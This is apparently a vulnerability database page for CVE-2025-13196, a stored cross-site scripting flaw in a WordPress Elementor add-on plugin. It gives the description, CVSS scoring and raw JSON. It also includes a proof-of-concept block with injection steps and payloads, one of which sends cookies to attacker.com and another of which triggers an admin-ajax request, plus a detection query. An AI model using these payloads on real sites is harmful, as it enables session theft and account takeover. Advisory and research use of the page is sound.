Security Vulnerability Report
中文
CVE-2025-13196 CVSS 5.4 MEDIUM

CVE-2025-13196

Published: 2025-11-18 10:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Open Street Map widget's marker content parameter in all versions up to, and including, 8.3.4. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the render function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Element Pack Addons for Elementor <= 8.3.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-13196 PoC - Element Pack Addons Stored XSS // Target: WordPress with Element Pack Addons plugin <= 8.3.4 // Step 1: Authenticate as Contributor or higher role // Step 2: Edit any page using Elementor page builder // Step 3: Add 'Open Street Map' widget to the page // Step 4: In marker content parameter, inject: // Malicious payload examples: const payloads = [ '<script>alert(document.cookie)</script>', '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>', '<svg onload=fetch("/wp-admin/admin-ajax.php?action=update_plugin&plugin=element-pack&nonce="+document.querySelector("#_wpnonce").value,{method:"POST",body:"...")})>', '<iframe src="javascript:alert(document.domain)">' ]; // Step 5: Save and publish the page // Step 6: Any user visiting the page will execute the injected script // Detection: Search for markers with XSS patterns in database // SELECT * FROM wp_postmeta WHERE meta_value LIKE '%<script%' OR meta_value LIKE '%onerror=%';

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13196", "sourceIdentifier": "[email protected]", "published": "2025-11-18T10:15:49.620", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Element Pack Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Open Street Map widget's marker content parameter in all versions up to, and including, 8.3.4. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the render function. This makes it possible for authenticated attackers, with contributor level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3396544%40bdthemes-element-pack-lite&old=3395028%40bdthemes-element-pack-lite&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0da6a080-260f-4b19-a32c-453d2781389a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.